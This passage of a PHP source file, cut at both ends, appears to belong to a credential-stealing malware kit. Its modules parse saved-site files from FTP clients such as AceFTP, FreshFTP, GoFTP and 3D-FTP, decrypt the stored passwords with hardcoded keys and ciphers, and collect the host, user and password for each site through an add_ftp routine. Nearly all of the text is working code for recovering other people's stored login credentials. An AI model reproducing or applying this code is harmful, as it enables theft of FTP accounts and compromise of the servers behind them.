7023. case 20:
7024. // UTF-8
7025. return Utf8ToWin($this->read_ace_data());
7026. break;
7027. default:
7028. $this->push_error('ERR_UNK_ACEFTP_ITEM_TYPE: '.$item_type);
7029. }
7030. return '';
7031. }
7032.  
7033. function read_ace_pair(&$name)
7034. {
7035. if (!$this->state)
7036. return '';
7037.  
7038. $name = $this->read_ace_str();
7039.  
7040. if (!strlen($name) || !$this->state)
7041. return '';
7042.  
7043. return $this->read_data($l);
7044. }
7045. }
7046.  
7047. class module_aceftp extends module
7048. {
7049. private function unpack_ftp_file($ftp_contents)
7050. {
7051. $bitmask = array(0, 1, 3, 7, 0xF, 0x1F, 0x3F, 0x7F, 0xFF, 0x1FF, 0x3FF, 0x7FF, 0x0FFF, 0x1FFF, 0x3FFF, 0x7FFF);
7052.  
7053. $source_file_len = strlen($ftp_contents)-4;
7054. $source_buffer = $ftp_contents;
7055. $unpacked_len = data_int32(substr($source_buffer, 0, 4));
7056. $source_buffer = substr($ftp_contents, 4).chr(0).chr(0).chr(0).chr(0);
7057. $first_flag = true;
7058. $output_buffer = '';
7059.  
7060. $bitmask_sum = 0;
7061. $bitmask_pos = 0;
7062. $bitmask_max = 0;
7063. $v23 = 0;
7064. $v22 = 0;
7065. $input_char_copy1 = 0;
7066. $input_char_copy0 = 0;
7067.  
7068. $unpack_buffer_offset = 0;
7069.  
7070. $unpack_buffer = array_fill(0, 32768, 0);
7071. $byte_shadow_table = array_fill(0, 32768, 0);
7072. $word_shadow_table = array_fill(0, 32770, 0);
7073. $unpacked_len2 = $unpacked_len;
7074.  
7075. if ($unpacked_len > 0)
7076. {
7077. do
7078. {
7079. if (0 >= $unpack_buffer_offset)
7080. {
7081. if ($first_flag)
7082. {
7083. $first_flag = false;
7084. $input_char = 0x100;
7085. } else
7086. {
7087. if ($bitmask_sum > $bitmask_max)
7088. break;
7089. $input_char = ($bitmask[$bitmask_pos] & _BF_SHR32(data_int32(substr($source_buffer, ($bitmask_sum >> 3), 4)), ($bitmask_sum & 7)));
7090. $bitmask_sum = $bitmask_sum + $bitmask_pos;
7091. }
7092.  
7093. if ($input_char == 0x100)
7094. {
7095. $bitmask_pos = 9;
7096. $bitmask_max = 8 * $source_file_len - 9;
7097. $v23 = 0x100 + 2;
7098. $v22 = 2 * 0x100;
7099. do
7100. {
7101. if ($bitmask_sum > $bitmask_max)
7102. break;
7103. $input_char = ($bitmask[$bitmask_pos] & _BF_SHR32(data_int32(substr($source_buffer, ($bitmask_sum >> 3), 4)), ($bitmask_sum & 7)));
7104. $bitmask_sum = $bitmask_sum + $bitmask_pos;
7105. } while ($input_char == 0x100);
7106.  
7107. $input_char_copy1 = $input_char;
7108. $input_char_copy0 = $input_char;
7109. } else
7110. {
7111. if ($input_char == 0x101)
7112. break;
7113.  
7114. $input_char_copy2 = $input_char;
7115.  
7116. if ($input_char >= $v23)
7117. {
7118. $unpack_buffer[$unpack_buffer_offset++] = $input_char_copy1;
7119. $input_char = $input_char_copy0;
7120. }
7121.  
7122. while ($input_char >= 0x100)
7123. {
7124. $unpack_buffer[$unpack_buffer_offset++] = $byte_shadow_table[$input_char];
7125. $input_char = $word_shadow_table[$input_char];
7126. }
7127.  
7128. $input_char_copy1 = $input_char;
7129.  
7130. if ($v23 <= 32767)
7131. {
7132. $word_shadow_table[$v23] = $input_char_copy0 & 0xffff;
7133. $byte_shadow_table[$v23] = $input_char_copy1 & 0xff;
7134. $v23++;
7135. if ($v23 >= $v22)
7136. {
7137. if ($v22 < 32767)
7138. {
7139. $v22 = $v22 * 2;
7140. $bitmask_pos++;
7141. $bitmask_max--;
7142. }
7143. }
7144. }
7145.  
7146. $input_char_copy0 = $input_char_copy2;
7147. }
7148. } else
7149. {
7150. $unpack_buffer_offset--;
7151. $input_char = $unpack_buffer[$unpack_buffer_offset];
7152. }
7153.  
7154. $output_buffer .= chr($input_char);
7155. $unpacked_len2--;
7156. } while ($unpacked_len2 > 0);
7157. }
7158.  
7159. return $output_buffer;
7160. }
7161.  
7162. protected function process_ftp_file($ftp_contents)
7163. {
7164. if (strlen($ftp_contents) <= 4)
7165. return;
7166.  
7167. $unpacked_data = $this->unpack_ftp_file($ftp_contents);
7168.  
7169. if (!strlen($unpacked_data))
7170. return;
7171.  
7172. $stream = new stream_ace($unpacked_data, $this->log);
7173.  
7174. $host = '';
7175. $user = '';
7176. $pass = '';
7177. $port = '';
7178. $dir = '';
7179. $dir_list = array();
7180. $protocol = '';
7181.  
7182. while ($stream->state)
7183. {
7184. $item_name = '';
7185. $item_value = $stream->read_ace_pair($item_name);
7186.  
7187. if (!strlen($item_name) || !$stream->state)
7188. {
7189. break;
7190. }
7191.  
7192. switch ($item_name)
7193. {
7194. case 'HostName': $host = $item_value; break;
7195. case 'Password': $pass = $item_value; break;
7196. case 'Port': $port = $item_value; break;
7197. case 'UserName': $user = $item_value; break;
7198. case 'InitialServerFolders.Strings': $dir_list = $item_value; break;
7199. case 'Protocol': $protocol = strtolower($item_value); break;
7200. }
7201. }
7202.  
7203. if (is_array($dir_list) && count($dir_list) > 0)
7204. {
7205. foreach ($dir_list as $dir)
7206. {
7207. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 'sftp'), $port, $dir), $user, $pass);
7208. }
7209. } else
7210. {
7211. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 'sftp'), $port, $dir), $user, $pass);
7212. }
7213. }
7214.  
7215. public function import_item($stream, $id)
7216. {
7217. switch ($id)
7218. {
7219. case 0x0000:
7220. $ftp_contents = $stream->read_str();
7221. $this->process_ftp_file($ftp_contents);
7222. break;
7223. default:
7224. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
7225. return false;
7226. }
7227. return true;
7228. }
7229. }
7230.  
7231. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
7232. // Global Downloader
7233.  
7234. class stream_globaldownloader extends stream
7235. {
7236. function read_word_str()
7237. {
7238. if (!$this->state)
7239. return false;
7240. return $this->read_strlen($this->read_word());
7241. }
7242.  
7243. function read_str()
7244. {
7245. if (!$this->state)
7246. return false;
7247.  
7248. $len = $this->read_byte();
7249. if ($len == 0xff)
7250. {
7251. $len = $this->read_word();
7252. if ($len == 0xffff)
7253. $len = $this->read_dword();
7254. return $this->read_strlen($len);
7255. }
7256. else
7257. return $this->read_strlen($len);
7258. }
7259. }
7260.  
7261. class module_globaldownloader extends module
7262. {
7263. private function decrypt($encrypted_password)
7264. {
7265. $crypt_pos = strpos($encrypted_password, '>>GD_ENCRYPTED<<');
7266. if ($crypt_pos === false)
7267. {
7268. return $encrypted_password;
7269. }
7270. $encrypted_password = substr($encrypted_password, 0, $crypt_pos);
7271. $encrypted_password = base64_decode($encrypted_password);
7272.  
7273. $crypt_array = array(0x50, 0x49, 0x1A, 0x52, 0x63, 0x1F, 0x54, 0x64, 0x1B, 0x1B, 0x24, 0x26, 0x33, 0x41, 0x45, 0x3E,
7274. 0x6D, 0x1E, 0x4D, 0x1B, 0x56, 0x47, 0x55, 0x5B, 0x6F, 0x4B, 0x47, 0x2D, 0x58, 0x63, 0x57, 0x25,
7275. 0x55, 0x21, 0x79, 0x74, 0x74, 0x34, 0x4E, 0x38, 0x71, 0x35, 0x78, 0x3C, 0x67, 0x60, 0x43, 0x24,
7276. 0x60, 0x73);
7277.  
7278. $crypt_key = '';
7279.  
7280. for ($i = 0; $i < count($crypt_array); $i++)
7281. $crypt_key .= chr($crypt_array[$i]);
7282.  
7283. $cipher_key = hextostr(md5($crypt_key));
7284.  
7285. return rc4Decrypt($cipher_key, $encrypted_password);
7286. }
7287.  
7288. protected function process_arch_file($arch_contents)
7289. {
7290. if (strlen($arch_contents) < 10)
7291. return;
7292.  
7293. $stream = new stream_globaldownloader($arch_contents, $this->log);
7294.  
7295. $stream->read_skip(4);
7296. $type = $stream->read_word_str();
7297. if ($type != 'CsmAddressTree')
7298. {
7299. $this->log->add('ERR_INVALID_ARCH_FILE_FORMAT');
7300. return;
7301. }
7302. $nSites = $stream->read_dword();
7303.  
7304. while ($stream->state && $nSites--)
7305. {
7306. $stream->read_str(); // Site path
7307. $stream->read_str(); // Local path
7308. $stream->read_str(); // Notes
7309. $pass = $this->decrypt($stream->read_str()); // Password
7310. $dir = $stream->read_str(); // Remote directory
7311. $host = $stream->read_str(); // Host
7312. $stream->read_str(); // Display name
7313. $user = $this->decrypt($stream->read_str()); // User name
7314. $port = $stream->read_dword();
7315. $protocol = $stream->read_str(); // Protocol
7316. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 'FTPS'), $port, $dir), $user, $pass);
7317. }
7318. }
7319.  
7320. public function import_item($stream, $id)
7321. {
7322. switch ($id)
7323. {
7324. case 0x0000:
7325. $arch_contents = $stream->read_str();
7326. $this->process_arch_file($arch_contents);
7327. break;
7328. default:
7329. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
7330. return false;
7331. }
7332. return true;
7333. }
7334. }
7335.  
7336. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
7337. // FreshFTP
7338.  
7339. //class to encrypt and decrypt according to the "PC1" algorithm
7340. // I. Verburgh 2007
7341. class PC1 {
7342. var $pkax;
7343. var $pkbx;
7344. var $pkcx;
7345. var $pkdx;
7346. var $pksi;
7347. var $pktmp;
7348. var $x1a2;
7349. var $pkres;
7350. var $pki;
7351. var $inter;
7352. var $cfc;
7353. var $cfd;
7354. var $compte;
7355. var $x1a0;
7356. var $cle;
7357. var $pkc;
7358. var $plainlen;
7359. var $ascipherlen;
7360. var $plainText;
7361. var $ascCipherText;
7362.  
7363.  
7364. function PC1() {
7365. }
7366.  
7367. function pkfin() {
7368. for ($j=0;$j<16;$j++) {
7369. $this->cle[$j] = "";
7370. }
7371. for ($j=0;$j<8;$j++) {
7372. $this->x1a0[$j] = 0;
7373. }
7374. $this->pkax = 0;
7375. $this->pkbx = 0;
7376. $this->pkcx = 0;
7377. $this->pkdx = 0;
7378. $this->pksi = 0;
7379. $this->pktmp = 0;
7380. $this->x1a2 = 0;
7381. $this->pkres = 0;
7382. $this->pki = 0;
7383. $this->inter = 0;
7384. $this->cfc = 0;
7385. $this->cfd = 0;
7386. $this->compte = 0;
7387. $this->pkc = 0;
7388. }
7389.  
7390. function pkcode() {
7391. $this->pkdx = $this->x1a2 + $this->pki;
7392. $this->pkax = $this->x1a0[$this->pki];
7393. $this->pkcx = 0x015a;
7394. $this->pkbx = 0x4e35;
7395. $this->pktmp = $this->pkax;
7396. $this->pkax = $this->pksi;
7397. $this->pksi = $this->pktmp;
7398. $this->pktmp = $this->pkax;
7399. $this->pkax = $this->pkdx;
7400. $this->pkdx = $this->pktmp;
7401. if ($this->pkax != 0) {
7402. $this->pkax = $this->wordmultiply($this->pkax, $this->pkbx);
7403. }
7404. $this->pktmp = $this->pkax;
7405. $this->pkax = $this->pkcx;
7406. $this->pkcx = $this->pktmp;
7407. if ($this->pkax != 0) {
7408. $this->pkax = $this->wordmultiply($this->pkax, $this->pksi);
7409. $this->pkcx = $this->wordsum($this->pkax, $this->pkcx);
7410. }
7411. $this->pktmp = $this->pkax;
7412. $this->pkax = $this->pksi;
7413. $this->pksi = $this->pktmp;
7414. $this->pkax = $this->wordmultiply($this->pkax, $this->pkbx);
7415. $this->pkdx = $this->wordsum($this->pkcx, $this->pkdx);
7416. $this->pkax = $this->wordsum($this->pkax, 1);
7417. $this->x1a2 = $this->pkdx;
7418. $this->x1a0[$this->pki] = $this->pkax;
7419. $this->pkres = $this->wordxor($this->pkax, $this->pkdx);
7420. $this->pki++;
7421. }
7422.  
7423. function wordmultiply($value1, $value2) {
7424. if (is_numeric($value1) && is_numeric($value2))
7425. $product = (($value1 * $value2) & 0xffff);
7426. else {
7427. $product = 0;
7428. }
7429. return $product;
7430. }
7431.  
7432. function wordsum($value1, $value2) {
7433. $sum = (($value1 + $value2) & 0xffff);
7434. return $sum;
7435. }
7436.  
7437. function wordminus($value1, $value2) {
7438. $minus = (($value1 - $value2) & 0xffff);
7439. return $minus;
7440. }
7441.  
7442. function wordxor($value1, $value2) {
7443. $outcome = (($value1 ^ $value2) & 0xffff);
7444. return $outcome;
7445. }
7446.  
7447. function pkassemble() {
7448. $this->x1a0[0] = $this->wordsum($this->wordmultiply(ord($this->cle[0]), 256), ord($this->cle[1]));
7449. $this->pkcode();
7450. $this->inter = $this->pkres;
7451.  
7452. $this->x1a0[1] = $this->wordxor($this->x1a0[0], $this->wordsum($this->wordmultiply(ord($this->cle[2]), 256), ord($this->cle[3])));
7453. $this->pkcode();
7454. $this->inter = $this->wordxor($this->inter, $this->pkres);
7455.  
7456. $this->x1a0[2] = $this->wordxor($this->x1a0[1], $this->wordsum($this->wordmultiply(ord($this->cle[4]), 256), ord($this->cle[5])));
7457. $this->pkcode();
7458. $this->inter = $this->wordxor($this->inter, $this->pkres);
7459.  
7460. $this->x1a0[3] = $this->wordxor($this->x1a0[2], $this->wordsum($this->wordmultiply(ord($this->cle[6]), 256), ord($this->cle[7])));
7461. $this->pkcode();
7462. $this->inter = $this->wordxor($this->inter, $this->pkres);
7463.  
7464. $this->x1a0[4] = $this->wordxor($this->x1a0[3], $this->wordsum($this->wordmultiply(ord($this->cle[8]), 256), ord($this->cle[9])));
7465. $this->pkcode();
7466. $this->inter = $this->wordxor($this->inter, $this->pkres);
7467.  
7468. $this->x1a0[5] = $this->wordxor($this->x1a0[4], $this->wordsum($this->wordmultiply(ord($this->cle[10]), 256), ord($this->cle[11])));
7469. $this->pkcode();
7470. $this->inter = $this->wordxor($this->inter, $this->pkres);
7471.  
7472. $this->x1a0[6] = $this->wordxor($this->x1a0[5], $this->wordsum($this->wordmultiply(ord($this->cle[12]), 256), ord($this->cle[13])));
7473. $this->pkcode();
7474. $this->inter = $this->wordxor($this->inter, $this->pkres);
7475.  
7476. $this->x1a0[7] = $this->wordxor($this->x1a0[6], $this->wordsum($this->wordmultiply(ord($this->cle[14]), 256), ord($this->cle[15])));
7477. $this->pkcode();
7478. $this->inter = $this->wordxor($this->inter, $this->pkres);
7479.  
7480. $this->pki=0;
7481. }
7482.  
7483. function encrypt($in, $key) {
7484. $this->pkfin();
7485. $this->k = 0;
7486. $this->plainlen = strlen($in);
7487. for ($count=0;$count<16;$count++) {
7488. if (isset($key[$count]))
7489. $this->cle[$count] = $key[$count];
7490. }
7491. for ($count=0;$count<$this->plainlen;$count++) {
7492. $this->pkc = ord($in[$count]);
7493. $this->pkassemble();
7494.  
7495. $this->cfc = $this->inter >> 8;
7496. $this->cfd = $this->inter & 255;
7497.  
7498. for ($this->compte=0;$this->compte<sizeof($this->cle);$this->compte++) {
7499. $this->cle[$this->compte] = chr($this->wordxor(ord($this->cle[$this->compte]), $this->pkc));
7500. }
7501. $this->pkc = $this->wordxor($this->pkc, ($this->wordxor($this->cfc, $this->cfd)));
7502.  
7503. $this->pkd = ($this->pkc >> 4);
7504. $this->pke = ($this->pkc & 15);
7505. $this->ascCipherText[$this->k] = $this->wordsum(0x61, $this->pkd);
7506. $this->k++;
7507. $this->ascCipherText[$this->k] = $this->wordsum(0x61, $this->pke);
7508. $this->k++;
7509. }
7510. $this->ascCipherText = array_map("chr", $this->ascCipherText);
7511. return implode("", $this->ascCipherText);
7512.  
7513. }
7514.  
7515. function decrypt($in, $key) {
7516. $this->pkfin();
7517. $return = "";
7518. for ($count=0;$count<16;$count++) {
7519. if (isset($key[$count]))
7520. $this->cle[$count] = $key[$count];
7521. else
7522. $this->cle[$count] = "";
7523. }
7524. $this->pksi = 0;
7525. $this->x1a2 = 0;
7526. $d = 0;
7527. $e = 0;
7528. $j = 0;
7529. $l = 0;
7530.  
7531. $len = strlen($in);
7532. while ($j < $len) {
7533. $rep = $in[$j];
7534. switch($rep) {
7535. case "a": {
7536. $d = 0;
7537. break;
7538. }
7539. case "b": {
7540. $d = 1;
7541. break;
7542. }
7543. case "c": {
7544. $d = 2;
7545. break;
7546. }
7547. case "d": {
7548. $d = 3;
7549. break;
7550. }
7551. case "e": {
7552. $d = 4;
7553. break;
7554. }
7555. case "f": {
7556. $d = 5;
7557. break;
7558. }
7559. case "g": {
7560. $d = 6;
7561. break;
7562. }
7563. case "h": {
7564. $d = 7;
7565. break;
7566. }
7567. case "i": {
7568. $d = 8;
7569. break;
7570. }
7571. case "j": {
7572. $d = 9;
7573. break;
7574. }
7575. case "k": {
7576. $d = 10;
7577. break;
7578. }
7579. case "l": {
7580. $d = 11;
7581. break;
7582. }
7583. case "m": {
7584. $d = 12;
7585. break;
7586. }
7587. case "n": {
7588. $d = 13;
7589. break;
7590. }
7591. case "o": {
7592. $d = 14;
7593. break;
7594. }
7595. case "p": {
7596. $d = 15;
7597. break;
7598. }
7599. }
7600.  
7601. $d = $d << 4;
7602. $j++;
7603.  
7604. $rep = $in[$j];
7605. switch($rep) {
7606. case "a": {
7607. $e = 0;
7608. break;
7609. }
7610. case "b": {
7611. $e = 1;
7612. break;
7613. }
7614. case "c": {
7615. $e = 2;
7616. break;
7617. }
7618. case "d": {
7619. $e = 3;
7620. break;
7621. }
7622. case "e": {
7623. $e = 4;
7624. break;
7625. }
7626. case "f": {
7627. $e = 5;
7628. break;
7629. }
7630. case "g": {
7631. $e = 6;
7632. break;
7633. }
7634. case "h": {
7635. $e = 7;
7636. break;
7637. }
7638. case "i": {
7639. $e = 8;
7640. break;
7641. }
7642. case "j": {
7643. $e = 9;
7644. break;
7645. }
7646. case "k": {
7647. $e = 10;
7648. break;
7649. }
7650. case "l": {
7651. $e = 11;
7652. break;
7653. }
7654. case "m": {
7655. $e = 12;
7656. break;
7657. }
7658. case "n": {
7659. $e = 13;
7660. break;
7661. }
7662. case "o": {
7663. $e = 14;
7664. break;
7665. }
7666. case "p": {
7667. $e = 15;
7668. break;
7669. }
7670. }
7671. $c = $d + $e;
7672. $this->pkassemble();
7673.  
7674. $this->cfc = $this->inter >> 8;
7675. $this->cfd = $this->inter & 255;
7676.  
7677. $c = $this->wordxor($c, ($this->wordxor($this->cfc, $this->cfd)));
7678.  
7679. for ($compte=0;$compte<16;$compte++)
7680. $this->cle[$compte] = chr($this->wordxor(ord($this->cle[$compte]), $c));
7681. $return = $return.chr($c);
7682. $j++;
7683. $l++;
7684. }
7685. return $return;
7686. }
7687. }
7688.  
7689. class module_freshftp extends module
7690. {
7691. private function decrypt($encrypted_password)
7692. {
7693. $encrypted_password = trim($encrypted_password);
7694. if (!strlen($encrypted_password) || (strlen($encrypted_password) % 2 != 0))
7695. return '';
7696.  
7697. // Use PC1 CIPHER (c) Alexander PUKALL 1991 to decrypt the password
7698. $pc = new PC1();
7699. $decrypted_password = $pc->decrypt(strtolower($encrypted_password), 'drianz');
7700.  
7701. for ($i = 0; $i < strlen($decrypted_password); $i++)
7702. if ($decrypted_password[$i] == chr(0))
7703. {
7704. $decrypted_password = substr($decrypted_password, 0, $i);
7705. break;
7706. }
7707. return $decrypted_password;
7708. }
7709.  
7710. protected function process_smf_file($smf_contents)
7711. {
7712. if (strlen($smf_contents) < 4)
7713. return;
7714.  
7715. $stream = new stream($smf_contents, $this->log);
7716.  
7717. $header = $stream->read_strlen(4);
7718.  
7719. if ($header != 'FFSM')
7720. {
7721. $this->log->add("ERR_INVALID_SMF_FILE_HEADER");
7722. return;
7723. }
7724.  
7725. $stream->read_skip(6);
7726. $nSites = $stream->read_dword();
7727.  
7728. while ($stream->state && $nSites--)
7729. {
7730. $stream->read_skip(5);
7731. $stream->read_strlen($stream->read_word()); // Site name
7732. $stream->read_skip(2);
7733. $host = $stream->read_strlen($stream->read_word()); // Host
7734. $port = $stream->read_dword();
7735. $user = $this->decrypt($stream->read_strlen($stream->read_word())); // User
7736. $pass = $this->decrypt($stream->read_strlen($stream->read_word())); // Password
7737. $dir = $stream->read_strlen($stream->read_word()); // Remote dir
7738. $stream->read_strlen($stream->read_word()); // Local dir
7739. $stream->read_skip(75);
7740. $stream->read_strlen($stream->read_word()); // Proxy host
7741. $stream->read_dword();
7742. $stream->read_strlen($stream->read_word()); // Proxy user
7743. $stream->read_strlen($stream->read_word()); // Proxy pass
7744. $stream->read_skip(32);
7745. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
7746. }
7747. }
7748.  
7749. public function import_item($stream, $id)
7750. {
7751. switch ($id)
7752. {
7753. case 0x0000:
7754. $arch_contents = $stream->read_str();
7755. $this->process_smf_file($arch_contents);
7756. break;
7757. default:
7758. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
7759. return false;
7760. }
7761. return true;
7762. }
7763. }
7764.  
7765. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
7766. // BlazeFTP
7767.  
7768. class module_blazeftp extends module
7769. {
7770. private function decrypt($encrypted_password)
7771. {
7772. $encrypted_password = trim($encrypted_password);
7773. if (!strlen($encrypted_password))
7774. return '';
7775.  
7776. $encrypted_password = hextostr($encrypted_password);
7777. if ($encrypted_password === false)
7778. {
7779. $this->log->add('ERR_INVALID_HEX_STRING');
7780. return '';
7781. }
7782.  
7783. $decrypted_password = '';
7784. for ($i = 0; $i < strlen($encrypted_password); $i++)
7785. $decrypted_password .= chr(~((ord($encrypted_password[$i]) << 4) + (ord($encrypted_password[$i]) >> 4)));
7786. return $decrypted_password;
7787. }
7788.  
7789. protected function process_ini_file($file_contents)
7790. {
7791. if (strlen($file_contents) <= 4)
7792. return;
7793.  
7794. $parsed_ini = parse_ini($file_contents);
7795.  
7796. foreach ($parsed_ini as $section)
7797. {
7798. if (!is_array($section))
7799. continue;
7800. $host = assign($section["address"]);
7801. $user = assign($section["username"]);
7802. $pass = $this->decrypt(assign($section["password"]));
7803. $dir = assign($section["defremotedir"]);
7804. $port = assign($section["port"]);
7805. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
7806. }
7807.  
7808. }
7809.  
7810. public function import_item($stream, $id)
7811. {
7812. switch ($id)
7813. {
7814. case 0x0000:
7815. $ini_contents = $stream->read_str();
7816. $this->process_ini_file($ini_contents);
7817. break;
7818. case 0x0001:
7819. $host = $stream->read_str();
7820. $user = $stream->read_str();
7821. $pass = $this->decrypt($stream->read_str());
7822. $port = $stream->read_str();
7823. if (strlen($port) == 4)
7824. {
7825. $port = data_int32($port);
7826. } else
7827. $port = 0;
7828. $this->add_ftp(append_port($host, $port), $user, $pass);
7829. break;
7830. default:
7831. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
7832. return false;
7833. }
7834. return true;
7835. }
7836. }
7837.  
7838.  
7839. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
7840. // NETFile
7841.  
7842. class module_netfile extends module
7843. {
7844. protected function process_ini_file($file_contents)
7845. {
7846. if (strlen($file_contents) <= 4)
7847. return;
7848.  
7849. $parsed_ini = parse_ini($file_contents);
7850.  
7851. foreach ($parsed_ini as $section)
7852. {
7853. if (!is_array($section))
7854. continue;
7855. $host = assign($section["address"]);
7856. $user = assign($section["userid"]);
7857. $pass = assign($section["password"]);
7858. $dir = assign($section["initial_directory"]);
7859. $port = assign($section["port"]);
7860. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
7861. }
7862.  
7863. }
7864.  
7865. public function import_item($stream, $id)
7866. {
7867. switch ($id)
7868. {
7869. case 0x0000:
7870. $ini_contents = $stream->read_str();
7871. $this->process_ini_file($ini_contents);
7872. break;
7873. default:
7874. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
7875. return false;
7876. }
7877. return true;
7878. }
7879. }
7880.  
7881. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
7882. // GoFTP
7883.  
7884. class module_goftp extends module
7885. {
7886. private function decrypt($password)
7887. {
7888. if (!strlen($password))
7889. return '';
7890.  
7891. $decoded_data = hextostr($password);
7892. if ($decoded_data === false)
7893. {
7894. $this->log->add('ERR_INVALID_HEX_STRING');
7895. return '';
7896. }
7897.  
7898. $iv = "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
7899. $key = "Goftp Rocks 91802sfaiolpqikeu39";
7900. $decrypted_data = mcrypt_decrypt(MCRYPT_RIJNDAEL_256, $key, $decoded_data, MCRYPT_MODE_ECB, $iv);
7901.  
7902. if (!strlen($decrypted_data))
7903. {
7904. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
7905. return '';
7906. }
7907.  
7908. $real_len = data_int32(substr($decrypted_data, 0, 4));
7909.  
7910. $decrypted_password = substr($decrypted_data, 4, $real_len);
7911. if (strlen($decrypted_password) != $real_len)
7912. {
7913. return '';
7914. }
7915.  
7916. return $decrypted_password;
7917. }
7918.  
7919. protected function process_ini_file($file_contents)
7920. {
7921. if (strlen($file_contents) <= 4)
7922. return;
7923.  
7924. $lines = parse_lines($file_contents);
7925.  
7926. if (is_array($lines) && count($lines) > 1)
7927. {
7928. array_shift($lines);
7929. foreach ($lines as $line)
7930. {
7931. $line = $this->decrypt($line);
7932. $pos = strrpos($line, '<FS>');
7933. if ($pos !== false)
7934. {
7935. $line = substr($line, $pos+4);
7936. if (strlen($line))
7937. {
7938. $ftp_settings = explode('~~~', $line);
7939. if (is_array($ftp_settings) && count($ftp_settings) > 5)
7940. {
7941. $host = $ftp_settings[0];
7942. $port = $ftp_settings[1];
7943. $user = $ftp_settings[2];
7944. $pass = $ftp_settings[3];
7945. $dir = $ftp_settings[5];
7946. if (count($ftp_settings) > 10)
7947. $protocol = $ftp_settings[10];
7948. else
7949. $protocol = '';
7950.  
7951. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 'SFTP - SSH2 encryption'), $port, $dir), $user, $pass);
7952. }
7953. }
7954. }
7955. }
7956. }
7957. }
7958.  
7959. public function import_item($stream, $id)
7960. {
7961. switch ($id)
7962. {
7963. case 0x0000:
7964. $ini_contents = $stream->read_str();
7965. $this->process_ini_file($ini_contents);
7966. break;
7967. default:
7968. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
7969. return false;
7970. }
7971. return true;
7972. }
7973. }
7974.  
7975. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
7976. // 3D-FTP
7977.  
7978. class module_3dftp extends module
7979. {
7980. private function decrypt($password)
7981. {
7982. if (substr($password, 0, 2) != '01')
7983. return '';
7984.  
7985. $alphabet = '23456789ABCDEFGHJKLMNPQRSTUVWXYZ';
7986. $password = strtoupper(substr($password, 2));
7987. $s1 = '';
7988. for ($i = 0; $i < strlen($password); $i++)
7989. {
7990. $k = strpos($alphabet, $password[$i]);
7991. if ($k === false)
7992. return '';
7993. $v = decbin($k);
7994. while (strlen($v) < 5)
7995. $v = '0'.$v;
7996. if (strlen($v) != 5)
7997. return '';
7998. $s1 .= $v;
7999. }
8000.  
8001. $s1 = substr($s1, 0, strlen($s1)-(strlen($s1) % 8));
8002. $s2 = str_repeat('0', strlen($s1));
8003.  
8004. $divider = 1;
8005.  
8006. for ($i = 1; $i <= floor(sqrt(strlen($s1))); $i++)
8007. {
8008. if ((strlen($s1) % $i) == 0)
8009. $divider = $i;
8010. }
8011.  
8012. $quotient = int_divide(strlen($s1), $divider);
8013. if (($quotient == 1) || ($divider == 1))
8014. return '';
8015.  
8016. $k = 0;
8017. for ($i = 0; $i <= $quotient-1; $i++)
8018. {
8019. for ($j = $divider-1; $j >= 0; $j--)
8020. {
8021. $t = (($i+$j*$quotient) % strlen($s1));
8022. $s2[$t] = $s1[$k++];
8023. }
8024. }
8025.  
8026. $result = '';
8027. for ($i = 0; $i < int_divide(strlen($s2), 8); $i++)
8028. {
8029. $result .= chr(bindec(substr($s2, $i*8, 8)));
8030. }
8031.  
8032. return $result;
8033. }
8034.  
8035. private function build_delimiters($line)
8036. {
8037. $k = 0;
8038. for ($i = 0; $i < strlen($line); $i++)
8039. {
8040. if ($line[$i] == '*')
8041. {
8042. if (($k % 2) == 0)
8043. {
8044. $line[$i] = chr(0);
8045. }
8046. }
8047.  
8048. if ($line[$i] == '\\')
8049. {
8050. $k++;
8051. } else
8052. {
8053. $k = 0;
8054. }
8055. }
8056.  
8057. return $line;
8058. }
8059.  
8060. protected function process_ini_file($file_contents)
8061. {
8062. if (strlen($file_contents) <= 4)
8063. return;
8064.  
8065. $lines = parse_lines($file_contents);
8066.  
8067. if (is_array($lines) && count($lines) > 1)
8068. {
8069. $first_line = array_shift($lines);
8070.  
8071. if ($first_line != '0003DFTP' && $first_line != '[Settings]')
8072. {
8073. $this->log->add("ERR_INVALID_3DFTP_INI_FILE");
8074. return;
8075. }
8076. foreach ($lines as $line)
8077. {
8078. if ($first_line == '[Settings]')
8079. {
8080. $pos = strpos($line, '[*');
8081. }
8082. else
8083. {
